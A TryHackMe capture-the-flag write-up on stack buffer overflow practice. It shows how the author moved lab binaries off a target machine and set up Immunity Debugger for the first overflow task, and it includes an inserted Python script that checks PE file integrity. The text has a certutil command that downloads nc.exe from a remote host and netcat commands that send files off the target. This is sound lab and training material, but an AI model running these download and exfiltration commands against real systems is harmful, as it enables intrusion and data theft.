TryHackMe: Buffer Overflow Prep

H0j3n
Published in The Startup
14 min read · Aug 14, 2020

Practice stack-based buffer overflows!

I did not use the RDP inside TryHackMe; instead, I downloaded all the files needed on the machine and put them on my own Windows machine.

How To Transfer The Files?

First, upload our nc.exe to that machine, because I can't find nc on the machine:

certutil -urlcache -f http://<IP>/nc.exe c:\Users\admin\Desktop\nc.exe

Then I just use nc to transfer files. I don't know how to transfer a whole directory, so instead I just transfer each one inside the vulnerable-apps directory.

#On Our Machine
nc -l -p 1234 > oscp.exe
#On Target Machine
nc.exe -w 3 <IP> 1234 < vulnerable-apps\oscp\oscp.exe

Keep doing that and let’s do all of the OVERFLOW tasks :) I’m excited to learn BOF >.<
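
nc does no integrity checking, so a connection that closes early leaves a short file on the receiving side. As an added example (not part of the original write-up), this Python script checks that a received .exe is a complete PE image and returns its SHA-256; the function names and the sample PE bytes are constructed for illustration.

```python
import hashlib
import struct
import sys

def check_pe_complete(data: bytes):
    """Return (ok, detail); detail is the SHA-256 on success, the reason on failure."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False, "missing MZ header"
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False, "missing PE signature"
    coff = e_lfanew + 4
    if len(data) < coff + 20:
        return False, "truncated COFF header"
    num_sections, = struct.unpack_from("<H", data, coff + 2)
    opt_size, = struct.unpack_from("<H", data, coff + 16)
    table = coff + 20 + opt_size                         # start of section table
    needed = table + 40 * num_sections
    if len(data) < needed:
        return False, "truncated section table"
    for i in range(num_sections):
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20 of each header
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_size:
            needed = max(needed, raw_ptr + raw_size)
    if len(data) < needed:
        return False, f"truncated: have {len(data)} bytes, sections need {needed}"
    return True, hashlib.sha256(data).hexdigest()

def build_sample_pe() -> bytes:
    """Constructed minimal PE layout (headers + one 512-byte section), not a real program."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    optional = b"\0" * 0xE0                               # contents not inspected here
    section = struct.pack("<8sIIII16x", b".text", 0x200, 0x1000, 0x200, 0x200)
    headers = dos + b"PE\0\0" + coff + optional + section
    return headers.ljust(0x200, b"\0") + b"\x90" * 0x200

if __name__ == "__main__":
    # Usage: python check_pe.py oscp.exe [more.exe ...]; with no arguments, use the sample
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, *check_pe_complete(fh.read()))
    else:
        sample = build_sample_pe()
        print("sample", *check_pe_complete(sample))
        print("sample cut at 700 bytes", *check_pe_complete(sample[:700]))
```

The check only covers data referenced by the section table, so also compare the printed SHA-256 with the output of `certutil -hashfile oscp.exe SHA256` on the source machine.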

OVERFLOW #1

Okay, now we should run Immunity Debugger as Administrator and open oscp.exe.

Immunity Debugger — open oscp.exe

Click the red play button, or go to Debug > Run. To check, we can connect with nc to the target machine on port 1337.

nc <IP> 1337
